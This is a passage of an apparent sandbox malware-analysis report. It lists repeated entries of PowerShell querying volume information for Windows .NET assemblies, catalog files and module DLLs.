              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
